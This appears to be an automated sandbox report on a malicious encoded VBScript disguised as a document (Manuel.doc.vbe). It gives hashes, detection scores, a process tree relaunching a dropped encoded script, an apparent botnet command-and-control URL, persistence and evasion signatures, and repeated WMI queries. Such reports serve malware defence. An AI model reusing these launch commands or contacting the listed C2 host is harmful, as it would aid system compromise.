Analysis Report Manuel.doc.vbe

Overview

General Information

Sample Name: Manuel.doc.vbe
Analysis ID: 369332
MD5: cc2db35f43b4a12700c431811a463439
SHA1: d838aaf8d656b7d8d0f48d13646e677eaad35f20
SHA256: fe9c78249937d57aaed2792238caeea298e715d9cf261add1fbfbaeeab084d40

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Creates an autostart registry key pointing to binary in C:\Windows
Sample contains encoded VBS code
Suspicious javascript / visual basic script found (invalid extension)
Uses an obfuscated file name to hide its real file extension (double extension)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
May sleep (evasive loops) to hinder dynamic analysis

Startup

  • System is w7x64
  • wscript.exe (PID: 2372 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Manuel.doc.vbe' MD5: 045451FA238A75305CC26AC982472367)
    • cmd.exe (PID: 2560 cmdline: 'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • wscript.exe (PID: 2300 cmdline: wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 045451FA238A75305CC26AC982472367)
  • cmd.exe (PID: 2824 cmdline: 'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • wscript.exe (PID: 2704 cmdline: wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 045451FA238A75305CC26AC982472367)
  • cmd.exe (PID: 2480 cmdline: 'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • wscript.exe (PID: 1616 cmdline: wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Manuel.doc.vbe; Avira: detected
Multi AV Scanner detection for submitted file
Source: Manuel.doc.vbe; Virustotal: Detection: 75%
Source: Manuel.doc.vbe; Metadefender: Detection: 55%
Source: Manuel.doc.vbe; ReversingLabs: Detection: 74%
Source: Binary string: wshom.pdb source: wscript.exe, 00000004.00000002.3148533955.0000000001F70000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148046580.0000000000370000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148147651.0000000000470000.00000002.00000001.sdmp
Source: unknown; DNS traffic detected: queries for: realy.mooo.com
Source: wscript.exe, 00000000.00000003.2068250667.00000000003EC000.00000004.00000001.sdmp; String found in binary or memory: http://realy.mooo.com
Source: wscript.exe, 00000000.00000003.2068250667.00000000003EC000.00000004.00000001.sdmp, wscript.exe, 00000004.00000002.3148136888.000000000041E000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148055856.00000000002AE000.00000004.00000020.sdmp; String found in binary or memory: http://realy.mooo.com/
Source: wscript.exe, 00000007.00000002.3148075473.000000000043E000.00000004.00000020.sdmp; String found in binary or memory: http://realy.mooo.com/(
Source: wscript.exe, 0000000A.00000002.3148055856.00000000002AE000.00000004.00000020.sdmp; String found in binary or memory: http://realy.mooo.com/bo
Source: wscript.exe, 00000004.00000002.3148976708.000000000490E000.00000004.00000001.sdmp, wscript.exe, 00000004.00000002.3148136888.000000000041E000.00000004.00000020.sdmp, wscript.exe, 00000007.00000002.3148926880.000000000393A000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.3148114769.00000000004C7000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148963520.0000000003EB6000.00000004.00000001.sdmp; String found in binary or memory: http://realy.mooo.com/bot/lancer/index.php?cmd=ping
Source: wscript.exe, 00000007.00000002.3148114769.00000000004C7000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148939482.0000000003E90000.00000004.00000001.sdmp; String found in binary or memory: http://realy.mooo.com/bot/lancer/index.php?cmd=pingAdva
Source: wscript.exe, 00000004.00000002.3148203777.00000000004A6000.00000004.00000020.sdmp; String found in binary or memory: http://realy.mooo.com/bot/lancer/index.php?cmd=pingAdvaX%L
Source: wscript.exe, 00000000.00000002.2070144321.0000000005120000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3149096479.00000000051E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3149114904.0000000005280000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3149109885.0000000005410000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wscript.exe, 00000000.00000002.2068750916.0000000001CE0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3148277604.0000000001C00000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148226103.0000000001C50000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148231089.0000000001C60000.00000002.00000001.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: wscript.exe, 00000000.00000002.2070144321.0000000005120000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3149096479.00000000051E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3149114904.0000000005280000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3149109885.0000000005410000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA

System Summary:

Sample contains encoded VBS code
Source: Manuel.doc.vbe.vbe_unpack; Binary string: End Function
Suspicious javascript / visual basic script found (invalid extension)
Source: unknown; Process created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: classification engine; Classification label: mal80.evad.winVBE@11/1@63/1
Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: C:\Windows\System32\wscript.exe; WMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
